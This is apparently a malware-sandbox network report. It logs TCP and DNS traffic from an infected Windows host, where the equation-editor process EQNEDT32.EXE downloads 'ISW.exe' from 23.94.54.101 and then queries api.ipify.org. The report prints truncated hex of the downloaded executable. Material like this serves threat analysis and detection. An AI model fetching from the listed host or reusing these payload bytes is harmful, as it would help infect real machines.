                                        May 2, 2024 17:39:46.784986973 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785001993 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785041094 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785042048 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785054922 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785093069 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785116911 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785135031 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785157919 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785177946 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785202980 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785238981 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785255909 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785290956 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785336018 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785372019 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785446882 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785492897 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785516977 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785553932 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785567045 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785578966 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785592079 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785620928 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785644054 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785656929 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785667896 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785691023 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785715103 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785761118 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785779953 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785794020 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785804987 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785834074 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785860062 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785907984 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.785928011 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.785990953 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786036015 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786108971 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786122084 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786155939 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786164999 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786187887 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786201954 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786233902 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786267996 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786282063 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786314964 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786318064 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786329031 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786371946 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786374092 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786386967 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786410093 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786425114 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786441088 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786472082 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786487103 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786564112 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786576986 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786587954 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786600113 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786611080 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786617041 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786623955 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786634922 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786648035 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786657095 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786657095 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786688089 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786710024 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786722898 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786732912 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786770105 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786782980 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786799908 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786811113 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786834002 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786838055 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786865950 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786881924 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786916971 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786956072 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.786958933 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.786973000 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.787017107 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.787041903 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.787055016 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.787082911 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.787154913 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.787168026 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.787223101 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.787240028 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.787254095 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.787290096 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.874403954 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874454975 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874500036 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.874506950 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874521971 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874572039 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.874603033 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874666929 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874703884 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.874737978 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874751091 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874789000 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.874789000 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874828100 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874866009 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.874875069 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874926090 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874938965 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.874963045 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.874994040 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875016928 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875037909 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.875087976 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875128031 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.875180960 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875224113 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875262022 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.875279903 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875348091 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875387907 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.875427008 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875495911 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.875519991 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875617027 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875657082 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.875698090 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875785112 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875822067 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.875900030 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875950098 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.875988007 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876043081 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876091957 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876136065 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876137018 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876203060 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876230001 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876241922 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876281977 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876302958 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876358986 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876391888 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876399040 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876456022 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876492977 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876555920 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876625061 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876666069 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876687050 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876709938 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876746893 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876787901 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876835108 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876873970 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.876897097 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.876971960 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877011061 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877046108 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877099991 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877141953 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877177954 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877286911 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877327919 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877408981 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877443075 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877484083 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877485037 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877554893 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877592087 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877592087 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877652884 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877693892 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877717972 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877758980 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877800941 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877806902 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877855062 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877890110 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.877909899 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.877975941 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878016949 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878026009 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878076077 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878115892 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878117085 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878189087 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878231049 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878240108 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878329039 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878366947 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878398895 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878467083 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878505945 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878510952 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878573895 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878611088 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878715992 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878779888 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878822088 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878822088 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878868103 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.878907919 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.878937006 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879023075 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879064083 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879087925 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879239082 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879278898 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879360914 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879451036 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879492044 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879551888 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879626036 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879663944 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879700899 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879714012 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879745007 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879827023 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879898071 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.879936934 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.879961014 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.880038977 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:46.880076885 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:46.880105972 CEST804916123.94.54.101192.168.2.22
                                        May 2, 2024 17:39:47.079874039 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:47.265019894 CEST4916180192.168.2.2223.94.54.101
                                        May 2, 2024 17:39:48.817950010 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:48.817984104 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:48.818156958 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:48.822304010 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:48.822316885 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.008527994 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.008620977 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:49.015948057 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:49.015953064 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.016211033 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.099980116 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:49.140129089 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.290808916 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.290865898 CEST44349162104.26.12.205192.168.2.22
                                        May 2, 2024 17:39:49.290916920 CEST49162443192.168.2.22104.26.12.205
                                        May 2, 2024 17:39:49.301601887 CEST49162443192.168.2.22104.26.12.205

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 2, 2024 17:39:48.615206957 CEST5456253192.168.2.228.8.8.8
                                        May 2, 2024 17:39:48.712471962 CEST53545628.8.8.8192.168.2.22
                                        May 2, 2024 17:39:48.714919090 CEST5456253192.168.2.228.8.8.8
                                        May 2, 2024 17:39:48.810549021 CEST53545628.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        May 2, 2024 17:39:48.615206957 CEST192.168.2.228.8.8.80xf793Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        May 2, 2024 17:39:48.714919090 CEST192.168.2.228.8.8.80xf793Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        May 2, 2024 17:39:48.712471962 CEST8.8.8.8192.168.2.220xf793No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                        May 2, 2024 17:39:48.712471962 CEST8.8.8.8192.168.2.220xf793No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                        May 2, 2024 17:39:48.712471962 CEST8.8.8.8192.168.2.220xf793No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                        May 2, 2024 17:39:48.810549021 CEST8.8.8.8192.168.2.220xf793No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                        May 2, 2024 17:39:48.810549021 CEST8.8.8.8192.168.2.220xf793No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                        May 2, 2024 17:39:48.810549021 CEST8.8.8.8192.168.2.220xf793No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • api.ipify.org
                                        • 23.94.54.101

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.224916123.94.54.101802064C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampBytes transferredDirectionData
                                        May 2, 2024 17:39:45.771538019 CEST69OUTGET /ISW.exe HTTP/1.1
                                        Connection: Keep-Alive
                                        Host: 23.94.54.101
                                        May 2, 2024 17:39:45.883047104 CEST1289INHTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Last-Modified: Thu, 02 May 2024 19:48:58 GMT
                                        Accept-Ranges: bytes
                                        ETag: W/"57b5b9c5c99cda1:0"
                                        Server: Microsoft-IIS/8.5
                                        Date: Thu, 02 May 2024 15:39:45 GMT
                                        Content-Length: 1219072
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7d 61 33 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 ea 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                        Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL}a3f"w@N@@@d|@.pu4@.text `.rdata@@.datalpH@.rsrc.@0@@.relocupv$@B [TRUNCATED]
                                        May 2, 2024 17:39:45.883065939 CEST1289INData Raw: 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8
                                        Data Ascii: Yh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3
                                        May 2, 2024 17:39:45.883079052 CEST1289INData Raw: c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 00 8d 8f 6c
                                        Data Ascii: O_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
                                        May 2, 2024 17:39:45.883085966 CEST1289INData Raw: 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 32 15 4d 00 41 a2 34 15 4d 00 6a 0a 89 0d 38 15 4d 00 89 0d 3c 15 4d 00 89 0d 40 15 4d 00 a2
                                        Data Ascii: C{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO GFGFGF aPF
                                        May 2, 2024 17:39:45.992738008 CEST1289INData Raw: 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e c9 c2 08 00 e8 de 08 00 00 eb f3 8b 49 30 eb e5 55 8b ec 83 ec 18 83 65 ec 00 8d 45 ec 83 65 f4 00 56
                                        Data Ascii: x3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSVu3WyQ>t(M@
                                        May 2, 2024 17:39:45.992767096 CEST1289INData Raw: fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff ff 00 8b 45 c0 0f 85 7b 03 04 00 8b 18 8d 8d 6c ff ff ff e8 65 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 45 fc 85
                                        Data Ascii: AjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuW
                                        May 2, 2024 17:39:45.992786884 CEST1289INData Raw: 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 01 04 00 83 7d 20 00 75 19 83 7d 24 00 0f 85 7e 01 04 00 33 c0 5d c2 20 00 6a ff 6a 77 e9 73 01 04 00 6a ff 6a 73 e9 6a
                                        Data Ascii: }}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;|SA23~,FDMEuNGA;|u[_FMFMLU
                                        May 2, 2024 17:39:45.992806911 CEST1289INData Raw: 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 4d 00 8a 45 b4 88 01 8b ce e8 db 0b 00 00 68 9c ca 49 00 8d 4d e0 e8 27 6e 00 00 6a 01 ff 35 18 14 4d 00 8d 4d b8 89 5d c4 89 5d
                                        Data Ascii: {uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]EmSSEPEPxMEciMluM"z
                                        May 2, 2024 17:39:45.992830038 CEST1289INData Raw: 48 04 eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 ff 31 ff 15 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e
                                        Data Ascii: HUVEPPh1hIEt3fP7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH
